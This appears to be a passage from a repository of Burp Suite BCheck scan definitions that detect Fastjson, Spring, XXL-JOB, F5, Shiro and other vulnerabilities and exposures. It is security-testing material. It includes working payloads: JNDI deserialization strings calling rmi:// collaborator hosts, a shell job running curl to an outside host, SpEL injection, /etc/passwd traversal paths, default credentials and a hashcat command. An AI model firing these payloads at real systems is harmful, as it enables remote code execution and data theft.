tags: "Fastjson", "Deserialization","RCE","Alibaba" 7 | 8 | define: 9 | payload = `\{"rand1":"@type":"LL\u0063\u006f\u006d.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"rmi://{generate_collaborator_address()}/{random_str(4)}","autoCommit":true}` 10 | 11 | given request then 12 | if {base.request.body} matches "^[{]" and "application/json" in {base.request.headers} then 13 | send request: 14 | body: {payload} 15 | 16 | if dns interactions then 17 | report issue: 18 | severity: high 19 | confidence: certain 20 | detail: "https://paper.seebug.org/1192/." 21 | remediation: "https://paper.seebug.org/1192/." 22 | end if 23 | end if 24 | -------------------------------------------------------------------------------- /examples/README.md: -------------------------------------------------------------------------------- 1 | # BCheck examples 2 | 3 | ## Blind SSRF with out-of-band detection 4 | 5 | Uses collaborator dynamically to detect server side request forgery. 6 | 7 | ## Exposed backup file 8 | 9 | Identifies if backup files are exposed. 10 | 11 | ## Exposed git directory 12 | 13 | Identifies if a git directory is present under the web root. 14 | 15 | ## Leaked AWS Tokens 16 | 17 | Observes responses passively and uses regular expressions to identify if AWS tokens are being leaked. 18 | 19 | ## Log4Shell 20 | 21 | Uses collaborator dynamically to detect vulnerability to CVE-2021-44228 via exploitation. 22 | 23 | ## Server Side Prototype Pollution 24 | 25 | Uses a mixture of response matching and dynamic requests to detect the presence of server side prototype pollution. 26 | 27 | ## Suspicious Input Transformation 28 | 29 | Uses a hueristic to detect transformed inputs which are an indicator of possible server-side code injection. 30 | 31 | -------------------------------------------------------------------------------- /other/files/configs/WordPress-ReadMe.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "WordPress README file Exposure" 4 | description: "Tests for WordPress README file exposed" 5 | author: "r3dg33k" 6 | tags: "exposure", "php", "wordpress" 7 | 8 | run for each: 9 | # you could add more values to this list to make the check repeat 10 | potential_path = 11 | "/readme.html", 12 | "/wp/readme.html", 13 | "/blog/wp/readme.html" 14 | 15 | given host then 16 | send request called check: 17 | method: "GET" 18 | path: {potential_path} 19 | 20 | if "First Things First" in {check.response.body} and {check.response.status_code} is "200" then 21 | report issue: 22 | severity: info 23 | confidence: certain 24 | detail: `WordPress README file found at {potential_path}.` 25 | remediation: "Ensure WordPress is hardened." 26 | end if 27 | -------------------------------------------------------------------------------- /other/files/npm-debug-log.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "NPM Debug Log Files" 4 | description: "Checks for NPM debug log files in current path as opposed to just root directory of site." 5 | author: "@puzzlepeaches" 6 | tags: "npm", "log", "exposure", "error" 7 | 8 | run for each: 9 | potential_path = 10 | "/npm-debug.log", 11 | "/assets/npm-debug.log" 12 | 13 | 14 | given request then 15 | send request called check: 16 | method: "GET" 17 | replacing path: `{regex_replace({regex_replace({base.request.url},"^.*?\/.*?\/.*?\/","/")},"([^/]+)$", "")}{potential_path}` 18 | 19 | if {check.response.body} matches "verbose cli" or 20 | {check.response.body} matches "verbose stack" and 21 | {check.response.status_code} is "200" then 22 | report issue: 23 | severity: low 24 | confidence: tentative 25 | detail: `NPM debug log file found at {potential_path}.` 26 | end if 27 | 28 | -------------------------------------------------------------------------------- /other/fastjson/Fastjson-1.2.67-Deserialization-RCE.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Fastjson 1.2.67 Deserialization RCE" 4 | description: "https://paper.seebug.org/1192/" 5 | author: "Javeley" 6 | tags: "Fastjson", "Deserialization","RCE","Alibaba" 7 | 8 | define: 9 | payload = `\{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties":\{"@type":"java.util.Properties","UserTransaction":"rmi://{generate_collaborator_address()}/{random_str(4)}"}}` 10 | 11 | given request then 12 | if {base.request.body} matches "^[{]" and "application/json" in {base.request.headers} then 13 | send request: 14 | body: {payload} 15 | 16 | if dns interactions then 17 | report issue: 18 | severity: high 19 | confidence: certain 20 | detail: "https://paper.seebug.org/1192/." 21 | remediation: "https://paper.seebug.org/1192/." 22 | end if 23 | end if 24 | -------------------------------------------------------------------------------- /vulnerabilities-CVEd/CVE-2022-22963-spring_cloud_function_rce.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "CVE-2022-22963 Spring Cloud Function RCE" 4 | description: "find CVE-2022-22963 Spring Cloud Function RCE " 5 | author: "timeshatter" 6 | tags: "Spring Cloud Function RCE","CVE-2022-22963" 7 | 8 | define: 9 | collaborator_address = {generate_collaborator_address()} 10 | poc = `new java.net.InetSocketAddress('{collaborator_address}',80)` 11 | 12 | given host then 13 | send request: 14 | method: "POST" 15 | path: "/functionRouter" 16 | body: "test" 17 | headers: 18 | "spring.cloud.function.routing-expression": {poc} 19 | 20 | if any interactions then 21 | report issue: 22 | severity: high 23 | confidence: certain 24 | detail: "find CVE-2022-22963 Spring Cloud Function RCE" 25 | remediation: "update Spring Cloud Function." 26 | end if 27 | -------------------------------------------------------------------------------- /vulnerabilities-CVEd/CVE-2021-20323 keycloak xss.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "CVE-2021-20323" 4 | description: "KeyCloak Post-Based reflected XSS | CVE-2021-20323" 5 | author: "Milad Fadavvi" 6 | tags: "injection,xss,rxss" 7 | 8 | run for each: 9 | potential_path = "/auth/realms/master/clients-registrations/openid-connect" 10 | 11 | given host then 12 | send request called check: 13 | method: "POST" 14 | path: {potential_path} 15 | body: "{\"\":1}" 16 | headers: "Content-type": "application/json" 17 | 18 | if "alert('Bo0oq')" in {check.response.body} and "org.keycloak" in {check.response.body} 19 | then 20 | report issue: 21 | severity: medium 22 | confidence: certain 23 | detail: `https://nvd.nist.gov/vuln/detail/CVE-2021-20323` 24 | remediation: "Update the KeyCloak!" 25 | end if 26 | -------------------------------------------------------------------------------- /other/files/configs/web-config.discovery.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "web.config file exposure" 4 | description: "IIS Web configuration file was detected." 5 | author: "@puzzlepeaches" 6 | tags: "exposure", "web", "config", "iis" 7 | 8 | run for each: 9 | potential_path = 10 | "/web.config", 11 | "/app/web.config", 12 | "/../../web.config" 13 | 14 | given request then 15 | send request called check: 16 | method: "GET" 17 | replacing path: `{regex_replace({regex_replace({base.request.url},"^.*?\/.*?\/.*?\/","/")},"([^/]+)$", "")}{potential_path}` 18 | 19 | if {check.response.status_code} is "200" and 20 | {check.response.body} matches "" and {check.response.body} matches "" then 21 | report issue: 22 | severity: low 23 | confidence: certain 24 | detail: `IIS Web configuration file was detected at {check.response.url}` 25 | end if -------------------------------------------------------------------------------- /vulnerabilities-CVEd/CVE-2025-29927-Next-js-middleware-bypass.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v2-beta 3 | name: "CVE-2025-29927 Next.js Middleware Bypass" 4 | description: "Next.js Detected, possible vulnerability" 5 | author: "Paul Schmelzel" 6 | tags: "CVE-2025-29927","Next.js","Nextjs","Bypass" 7 | 8 | given request then 9 | send request: 10 | headers: 11 | "x-nextjs-data": "1" 12 | 13 | if {latest.response.headers} matches "x-nextjs-rewrite:" then 14 | report issue: 15 | severity: medium 16 | confidence: firm 17 | detail: "The site is using NextJS and may be vulnerble to a bypass as described in CVE-2025-29927. See https://slcyber.io/assetnote-security-research-center/doing-the-due-diligence-analysing-the-next-js-middleware-bypass-cve-2025-29927/ for further exploit details." 18 | remediation: "Do not accept headers from users such as x-nextjs-data or x-middleware-subrequest." 19 | end if 20 | -------------------------------------------------------------------------------- /other/fastjson/Fastjson-1.2.47-Deserialization-RCE.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Fastjson 1.2.47 Deserialization RCE" 4 | description: "https://paper.seebug.org/1192/" 5 | author: "Javeley" 6 | tags: "Fastjson", "Deserialization","RCE","Alibaba" 7 | 8 | define: 9 | payload = `\{"a":\{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":\{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://{generate_collaborator_address()}/{random_str(4)}","autoCommit":true}}` 10 | 11 | 12 | given request then 13 | if {base.request.body} matches "^[{]" and "application/json" in {base.request.headers} then 14 | send request: 15 | body: {payload} 16 | 17 | if dns interactions then 18 | report issue: 19 | severity: high 20 | confidence: certain 21 | detail: "https://paper.seebug.org/1192/." 22 | remediation: "https://paper.seebug.org/1192/." 23 | end if 24 | end if 25 | -------------------------------------------------------------------------------- /other/prometheus/unauth-access-to-prometheus-server.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Unauthenticated Access to Prometheus (passive)" 4 | description: "Check if the Prometheus Server is publicly accessible." 5 | author: "@nightshiba" 6 | tags: "passive" 7 | 8 | given response then 9 | if {latest.response.status_code} is "200" 10 | and ({latest.response.body} matches "Prometheus Time Series Collection and Processing Server" 11 | or ({latest.response.body} matches "Metrics'" and {latest.response.body} matches "Exporter")) then 12 | report issue: 13 | severity: medium 14 | confidence: certain 15 | detail: "The Prometheus Server is publicly accessible without any authentication. This can lead to sensitive data exposure." 16 | remediation: "Ensure that the Prometheus Server is not publicly accessible and is properly secured." 17 | end if 18 | -------------------------------------------------------------------------------- /vulnerabilities-CVEd/CVE-2020-5902 F5 Networks Authentication Bypass.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "CVE-2020-5902 F5 Networks Authentication Bypass" 4 | description: "Checks for CVE-2020-5902" 5 | author: "Ollie Whitehouse" 6 | tags: "CVE-2020-5902 CVE" 7 | 8 | run for each: 9 | potential_path = 10 | "tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd", 11 | "hsqldb;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" 12 | 13 | given host then 14 | send request called check: 15 | method: "GET" 16 | path: {potential_path} 17 | 18 | # Checks that we get a 200 AND that the output we expect in the result 19 | if {check.response.status_code} is "200" and "root:" in {check.response.body} then 20 | report issue: 21 | severity: high 22 | confidence: certain 23 | detail: "Host is vulnerable to the authentication bypass vulnerability CVE-2020-5902" 24 | remediation: "Patch to a non vulnerable version" 25 | end if 26 | -------------------------------------------------------------------------------- /other/MsExchange-ECP-Admin-Accessible.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Microsoft Exchange Admin Center Exposure" 4 | description: "Tests for MS Exchnage Admin Center exposure" 5 | author: "r3dg33k" 6 | tags: "msexchange", "ecp", "admin-panel" 7 | 8 | run for each: 9 | # you could add more values to this list to make the check repeat 10 | potential_path = "/ecp" 11 | 12 | given host then 13 | send request called check: 14 | method: "GET" 15 | path: {potential_path} 16 | 17 | if "Object moved" in {check.response.body} and 18 | {check.response.status_code} is "302" then 19 | report issue: 20 | severity: low 21 | confidence: certain 22 | detail: `Microsoft Exchange Admin Center Login Page found at {potential_path}.` 23 | remediation: "Block access to the EAC based on IP Address. https://social.technet.microsoft.com/wiki/contents/articles/52076.exchange-2016-restrict-access-to-the-eac-in-iis.aspx" 24 | end if 25 | -------------------------------------------------------------------------------- /other/tokens/jwt-hmac-alg-detected.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v2-beta 3 | name: "HMAC-Signed JWT Identified" 4 | description: "Detects JWTs using HMAC signing in responses" 5 | author: "Paul Schmelzel" 6 | tags: "passive", "jwt", "hmac", "hashcat" 7 | 8 | given response then 9 | if {latest.response} matches "(eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9|eyJhbGciOiJIUzM4NCIsInR5cCI6IkpXVCJ9|eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9|eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9|eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzM4NCJ9|eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9|eyJhbGciOiJIUzI1NiJ9|eyJhbGciOiJIUzM4NCJ9|eyJhbGciOiJIUzUxMiJ9)" then 10 | report issue: 11 | severity: info 12 | confidence: certain 13 | detail: "JWT using HMAC (HS256 / HS384 / HS512) detected in response. You can submit this JWT to hashcat for cracking using `hashcat -a 0 -m 16500 `" 14 | remediation: "Avoid using HMAC (symmetric) signing algorithms for JWTs in security-sensitive applications." 15 | end if 16 | 17 | -------------------------------------------------------------------------------- /vulnerabilities-CVEd/CVE-2018-1273-spring_data_commons_rce.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "CVE-2018-1273 Spring Data Commons RCE" 4 | description: "Spring Data Commons RCE (CVE-2018-1273)" 5 | author: "timeshatter" 6 | tags: "Spring Data Commons RCE","CVE-2018-1273" 7 | 8 | define: 9 | poc="[#this.getClass().forName('org.springframework.web.context.request.RequestContextHolder').getRequestAttributes().getResponse().addHeader('vuln', 'True')]" 10 | answer="vuln: True" 11 | 12 | given request then 13 | send request: 14 | replacing body: {regex_replace({base.request.body},"(\w+)=",`$1{poc}=`)} 15 | 16 | if {answer} in {latest.response} then 17 | report issue: 18 | severity: high 19 | confidence: certain 20 | detail: "The application transforms input in a way that suggests it might be 21 | vulnerable to Spring Data Commons RCE (CVE-2018-1273)." 22 | remediation: "Manual investigation is advised." 23 | end if -------------------------------------------------------------------------------- /vulnerabilities-CVEd/CVE-2023-35078 Ivanti EPMM Unauthenticate Access.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Ivanti API Unauthenticated Access" 4 | description: "Ivanti Endpoint Manager Mobile (EPMM) - Unauthenticated Access" 5 | author: "Dolph Flynn" 6 | tags: "Ivanti", "Unauthenticated Access", "CVE-2023-35078" 7 | 8 | 9 | given host then 10 | send request called check: 11 | method: "GET" 12 | path: "/mifs/aad/api/v2/admins/users" 13 | 14 | if {check.response.status_code} is "200" and 15 | {check.response.headers} matches "application/json" and 16 | "name" in {check.response.body} and 17 | "results" in {check.response.body} and 18 | "userId" in {check.response.body} 19 | then 20 | report issue: 21 | severity: high 22 | confidence: certain 23 | detail: "Ivanti EPMM API unauthenticated access (CVE-2023-35078) detected." 24 | remediation: "Apply vendor patch to fix vulnerability." 25 | end if 26 | 27 | -------------------------------------------------------------------------------- /vulnerabilities-CVEd/CVE-2020-1957-shiro_auth_bypass.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "CVE-2020-1957 Shiro AuthBypass" 4 | description: "AuthBypass CVE-2020-1957" 5 | author: "timeshatter" 6 | tags: "Shiro", "AuthBypass CVE-2020-1957", "active" 7 | 8 | given request then 9 | if not ({base.response.status_code} is "200") then 10 | send request called check: 11 | replacing headers: 12 | "Cookie": "rememberMe=1" 13 | 14 | if "rememberMe=deleteMe" in {check.response} then 15 | send request called auth_pass_check: 16 | replacing path: `/xxx/..;{base.request.url.path}` 17 | 18 | if {auth_pass_check.response.status_code} is "200" then 19 | report issue: 20 | severity: high 21 | confidence: certain 22 | detail: "find shiro AuthBypass CVE-2020-1957" 23 | remediation: "update shiro to last." 24 | end if 25 | end if 26 | end if -------------------------------------------------------------------------------- /other/xxl-job/xxl_job_rce.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "xxl job rce" 4 | description: "xxl job rce detection" 5 | author: "timeshatter" 6 | tags: "xxl job" 7 | 8 | define: 9 | poc = `\{"jobId": 66666666,"executorHandler": "demoJobHandler","executorParams":"demoJobHandler","executorBlockStrategy": "COVER_EARLY","executorTimeout": 0, "logId": 1,"logDateTime": 1586629003729,"glueType": "GLUE_SHELL","glueSource": "curl {generate_collaborator_address()}","glueUpdatetime": 1586699003758,"broadcastIndex": 0,"broadcastTotal": 0}` 10 | 11 | given host then 12 | send request: 13 | method: "POST" 14 | path: "/run" 15 | headers: 16 | "Content-Type": "application/json" 17 | body: {poc} 18 | 19 | if any interactions then 20 | report issue: 21 | severity: high 22 | confidence: certain 23 | detail: "xxl job rce detection." 24 | remediation: "Turn on the authentication component that comes with XXL-JOB." 25 | end if 26 | -------------------------------------------------------------------------------- /vulnerabilities-CVEd/CVE-2022-22965-spring_data_binding_rce.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "CVE-2022-22965 Spring Data Binding RCE" 4 | description: "find CVE-2022-22965 Spring Data Binding RCE" 5 | author: "timeshatter" 6 | tags: "Spring Data Binding RCE","CVE-2022-22965" 7 | 8 | define: 9 | poc = "class.module.classLoader.URLs%5B0%5D=0" 10 | poctest = "class.module.classLoader.vulntest=1" 11 | 12 | given request then 13 | send request called check : 14 | appending queries: {poc} 15 | 16 | if {check.response.status_code} is "400" then 17 | send request called check2 : 18 | appending queries: {poctest} 19 | 20 | if {check2.response.status_code} is {base.response.status_code} then 21 | report issue: 22 | severity: high 23 | confidence: tentative 24 | detail: "find CVE-2022-22965 Spring Data Binding RCE" 25 | remediation: "update Spring Data Binding." 26 | end if 27 | end if 28 | -------------------------------------------------------------------------------- /other/springboot/Springboot logfile actuator.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Springboot logfile actuator" 4 | description: "Springboot logfile actuator exposed and may expose sensitive information" 5 | author: "Mateusz Dabrowski (dbrwsky)" 6 | tags: "actuator", "springboot", "exposure", "informative" 7 | 8 | run for each: 9 | potential_path = 10 | "/logfile", 11 | "/actuator/logfile" 12 | 13 | given host then 14 | send request called check: 15 | method: "GET" 16 | path: {potential_path} 17 | 18 | if {check.response.status_code} is "200" 19 | and "[main]" in {check.response.body} 20 | and "INFO" in {check.response.body} 21 | and "text/plain" in {check.response.headers} then 22 | report issue: 23 | severity: low 24 | confidence: certain 25 | detail: `Springboot logfile actuator found at {potential_path}.` 26 | remediation: "Ensure logfile actuator is not exposed and doesn't contain sensitive information." 27 | end if -------------------------------------------------------------------------------- /other/APIs/couchbase-unauth-apis.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v2-beta 3 | name: "Couchbase Buckets Unauthenticated REST API - Detect" 4 | description: "Couchbase Buckets REST API without authentication was detected" 5 | author: "Nithissh" 6 | 7 | run for each: 8 | # you could add more values to this list to make the check repeat 9 | potential_path = 10 | "/pools/default/buckets" 11 | 12 | given host then 13 | send request called check: 14 | method: "GET" 15 | path: {potential_path} 16 | 17 | if {check.response.status_code} is "200" 18 | and "couchbase" in {check.response.body} 19 | and "bucket" in {check.response.body} 20 | and "data" in {check.response.body} 21 | and "application/json" in {check.response.headers} then 22 | report issue: 23 | severity: medium 24 | confidence: certain 25 | remediation: "Public access should be revoked" 26 | detail: `Couchbase bucket publicly exposed on {potential_path}.` 27 | end if 28 | -------------------------------------------------------------------------------- /other/nacos/Nacos-default-password.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Nacos default password" 4 | description: "Nacos Default Password" 5 | tags: "Unauthorized","Nacos","DefaultPassword" 6 | author: "JaveleyQAQ" 7 | 8 | define: 9 | data = "username=nacos&password=nacos" 10 | 11 | run for each: 12 | nacos_detect = 13 | "/nacos/v1/auth/users/login", 14 | "/v1/auth/users/login" 15 | 16 | given host then 17 | send request called nacos: 18 | method: "POST" 19 | path: {nacos_detect} 20 | headers: 21 | "Content-Type": "application/x-www-form-urlencoded" 22 | appending body: {data} 23 | if {nacos.response.status_code} is "200" and "\"accessToken\":" in {nacos.response.body} and "Authorization" in {nacos.response.headers} then 24 | report issue: 25 | severity: high 26 | confidence: certain 27 | detail: `Nacos Default User: nacos/nacos` 28 | remediation: "Change your password" 29 | end if 30 | 31 | -------------------------------------------------------------------------------- /other/tokens/aws-access-secret-key.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "AWS Access/Secret Key Disclosure" 4 | description: "Looks for AWS Access/Secret Key in page source." 5 | author: "@puzzlepeaches" 6 | tags: "disclosure", "aws", "generic", "exposure", "amazon" 7 | 8 | given response then 9 | if {latest.response} matches "(?:\"|')?AWS_SECRET_ACCESS_KEY(?:\"|')?\\s*:\\s*(?:\"|')?[A-Za-z0-9\\/+=]{40}(?:\"|')?" then 10 | report issue: 11 | severity: low 12 | confidence: tentative 13 | detail: "AWS Access/Secret Key found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and\/or sensitive data from page source." 15 | else if {latest.response} matches "(?:\"|')?AWS_ACCESS_KEY_ID(?:\"|')?\\s*:\\s*(?:\"|')?[A-Z0-9]{20}(?:\"|')?" then 16 | report issue: 17 | severity: low 18 | confidence: tentative 19 | detail: "AWS Access Key ID found in page." 20 | remediation: "Review and remove unnecessary exposure of keys and\/or sensitive data from page source." 21 | end if -------------------------------------------------------------------------------- /other/SAP/SAP authentication bypass check.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "SAP authentication bypass check" 4 | description: "Tests for Sap authentication bypass SAP Note 2258786 Checking if the public 5 | endpoint of sap/admin/public is accessible which would leak the patch management and internal urls" 6 | author: "Bob van der Staak" 7 | tags: "SAP", "Authentication Bypass" 8 | 9 | run for each: 10 | potential_path = 11 | "/sap/admin/public/index.html" 12 | 13 | 14 | given host then 15 | send request called check: 16 | method: "GET" 17 | path: {potential_path} 18 | 19 | if "Administration" in {check.response.body} and {check.response.status_code} is "200" then 20 | report issue: 21 | severity: medium 22 | confidence: certain 23 | detail: `Sap information leaking found at the following path {potential_path}.` 24 | remediation: "Follow the actions which are required in SAP Note 2258786" 25 | end if 26 | 27 | 28 | 29 | 30 | 31 | 32 | -------------------------------------------------------------------------------- /other/fastjson/Fastjson-1.2.42-Deserialization-RCE.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Fastjson 1.2.42 Deserialization RCE" 4 | description: "https://paper.seebug.org/1192/" 5 | author: "Javeley" 6 | tags: "Fastjson", "Deserialization","RCE","Alibaba" 7 | 8 | define: 9 | # payload = `\{"@type":"LL\u0063\u006f\u006d.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"rmi://{generate_collaborator_address()}/a","autoCommit":true}` 10 | payload = `\{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"rmi://{generate_collaborator_address()}/{random_str(4)}", "autoCommit":true}` 11 | 12 | given request then 13 | 14 | if {base.request.body} matches "^[{]" and "application/json" in {base.request.headers} then 15 | send request: 16 | body: {payload} 17 | 18 | if dns interactions then 19 | report issue: 20 | severity: high 21 | confidence: certain 22 | detail: "https://paper.seebug.org/1192/." 23 | remediation: "https://paper.seebug.org/1192/." 24 | end if 25 | end if 26 | -------------------------------------------------------------------------------- /examples/suspicious-input-transformation.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Insertion-point-level" 4 | description: "Inserts a calculation into each parameter to detect suspicious input transformation" 5 | author: "Carlos Montoya" 6 | 7 | define: 8 | calculation = "{{1337*1337}}" 9 | answer = "1787569" 10 | 11 | # we will automatically insert into nested insertion points 12 | given insertion point then 13 | # prevent false positives by checking answer isn't 14 | # already in base response 15 | if not({answer} in {base.response}) then 16 | send payload: 17 | appending: {calculation} 18 | 19 | if {answer} in {latest.response} then 20 | report issue: 21 | severity: high 22 | confidence: tentative 23 | detail: "The application transforms input in a way that suggests it might be 24 | vulnerable to some kind of server-side code injection." 25 | remediation: "Manual investigation is advised." 26 | end if 27 | end if 28 | -------------------------------------------------------------------------------- /other/JavaScript/malicious_javascript_imported.bcheck: -------------------------------------------------------------------------------- 1 | # Inspired by KnugiHK's 'Malicious Polyfill CDN In Use' BCheck 2 | # Uses domains highlighted by https://sansec.io/research/polyfill-supply-chain-attack: 3 | # polyfill.io, bootcdn.net, bootcss.com, staticfile.net, staticfile.org, unionadjs.com, xhsbpza.com, union.macoms.la, newcrbpc.com 4 | 5 | metadata: 6 | language: v2-beta 7 | name: "Malicious JavaScript import in use" 8 | description: "Inspects HTML responses for script tags that reference domains known to serve malware" 9 | author: "Dolph Flynn" 10 | tags: "passive", "javascript" 11 | 12 | given response then 13 | 14 | if {latest.response.headers} matches "text/html" and 15 | {latest.response.body} matches "" then 16 | report issue: 17 | severity: high 18 | confidence: firm 19 | detail: "JavaScript loaded from malicious domain." 20 | end if 21 | -------------------------------------------------------------------------------- /vulnerabilities-CVEd/CVE-2017-8046-spring_data_rest_rce.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "CVE-2017-8046 Spring Data Rest RCE" 4 | description: "Spring Data Rest RCE (CVE-2017-8046)" 5 | author: "timeshatter" 6 | tags: "Spring Data Rest RCE","CVE-2017-8046" 7 | 8 | define: 9 | poc="[{ \"op\": \"replace\", \"path\": \"{T(org.springframework.web.context.request.RequestContextHolder).getRequestAttributes().getResponse().addHeader('vuln', 'True')}/aa\", \"value\": \"aaa\" }]" 10 | answer="vuln: True" 11 | 12 | given request then 13 | send request: 14 | method: "PATCH" 15 | headers: 16 | "Content-Type":"application/json-patch+json" 17 | body: {poc} 18 | 19 | if {answer} in {latest.response} then 20 | report issue: 21 | severity: high 22 | confidence: certain 23 | detail: "The application transforms input in a way that suggests it might be 24 | vulnerable to Spring Data Rest RCE(CVE-2017-8046)." 25 | remediation: "Manual investigation is advised." 26 | end if 27 | -------------------------------------------------------------------------------- /other/files/ruby-on-rails-storage.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Ruby on Rails storage.yml File Disclosure" 4 | description: "Checks for Ruby on Rails storage.yml file disclosure." 5 | author: "@puzzlepeaches" 6 | tags: "ruby", "storage", "exposure", "rails" 7 | 8 | run for each: 9 | potential_path = 10 | "/storage.yml", 11 | "/config/storage.yml", 12 | "/ruby/config/storage.yml", 13 | "/railsapp/config/storage.yml" 14 | 15 | 16 | given request then 17 | send request called check: 18 | method: "GET" 19 | replacing path: `{regex_replace({regex_replace({base.request.url},"^.*?\/.*?\/.*?\/","/")},"([^/]+)$", "")}{potential_path}` 20 | 21 | if {check.response.body} matches "service:" or 22 | {check.response.body} matches "local:" and 23 | {check.response.status_code} is "200" and 24 | not({check.response.headers} matches "text/html" or {check.response.headers} matches "application/json") then 25 | report issue: 26 | severity: low 27 | confidence: firm 28 | detail: `Ruby on Rails storage.yml file disclosure.` 29 | end if 30 | 31 | -------------------------------------------------------------------------------- /other/symfony-verbose-debug-mode.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Misconfigured Symfony Verbose Plugin" 4 | description: "Misconfigured Symfony Verbose plugin vulnerable to sensitive data exposure." 5 | author: "Yasin Yilmaz" 6 | tags: "symfony", "php" 7 | 8 | run for each: 9 | potential_path = 10 | "/raxacoricofallapatorians", 11 | "/frontend_dev.php/$" 12 | 13 | given host then 14 | send request called check: 15 | method: "GET" 16 | path: {potential_path} 17 | 18 | if {check.response.status_code} is "404" 19 | and "Profiler" in {check.response.body} or "sfError404Exception" in {check.response.body} or "SF_ROOT_DIR" in {check.response.body} or "sf_globals" in {check.response.body} or "sfWebDebug" in {check.response.body} or "Debug toolbar" in {check.response.body} then 20 | report issue: 21 | severity: high 22 | confidence: tentative 23 | detail: `Misconfigured Symfony Verbose plugin vulnerable to sensitive data exposure.` 24 | remediation: "Disable Symfony Verbosity." 25 | end if 26 | -------------------------------------------------------------------------------- /other/JavaScript/jsMapFile.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Javascript Source map detected" 4 | description: "This rule checks for the presence of indicators suggesting the availability of a JavaScript map file." 5 | author: "TheButcher" 6 | tags: "passive","javascript","informative" 7 | 8 | given response then 9 | if {latest.response.headers} matches "application/javascript" or {latest.response.headers} matches "text/javascript" then 10 | if {latest.response.body} matches "sourceMappingURL=" then 11 | report issue: 12 | severity: info 13 | confidence: firm 14 | detail: "Client-side JavaScript source code can be combined, minified, or compiled. A source map is a file that maps from the transformed source code back to the original source code. However, exposing a source map in a production environment may potentially aid attackers in reading and debugging JavaScript code." 15 | remediation: "According to the best practices, source maps should not be accessible in a Production Environment." 16 | end if 17 | end if 18 | -------------------------------------------------------------------------------- /vulnerabilities-CVEd/CVE-2023-37265 - CasaOS - Auth Bypass due to a lack of IP address verification.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "CVE-2023-37265 - CasaOS - Auth Bypass due to a lack of IP address verification" 4 | description: "Checks for CVE-2023-37265" 5 | author: "Dolph Flynn" 6 | tags: "CVE-2023-37265", "CasaOS", "auth-bypass", "RCE" 7 | 8 | 9 | define: 10 | potential_path = "/v1/folder?path=%2F" 11 | 12 | 13 | given host then 14 | send request called check: 15 | method: "GET" 16 | path: {potential_path} 17 | headers: 18 | "X-Forwarded-For": "127.0.0.1" 19 | 20 | 21 | if {check.response.body} matches "\"success\":200\b" and {check.response.body} matches "\"message\":\"ok\"" and 22 | {check.response.body} matches "\bcontent\b" and {check.response.body} matches "\bis_dir\b" then 23 | 24 | report issue: 25 | severity: high 26 | confidence: tentative 27 | detail: "CasaOS < 0.4.4 - Auth Bypass via Internal IP." 28 | remediation: "Apply patch within CasaOS 0.4.4." 29 | end if 30 | -------------------------------------------------------------------------------- /other/Etcd Server - Unauthenticated Access.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Etcd Server - Unauthenticated Access" 4 | author: "Parimal Shaw" 5 | description: "A Kubernetes etcd server stores the cluster secrets and configurations files. Anonymous access on etcd allows unauthenticated access the data without providing any authentication credentials." 6 | tags: "Kubernetes Misconfiguration" 7 | 8 | define: 9 | potential_path = "/v2/keys/" 10 | 11 | 12 | given host then 13 | send request called check: 14 | method: "GET" 15 | path: {potential_path} 16 | 17 | 18 | if 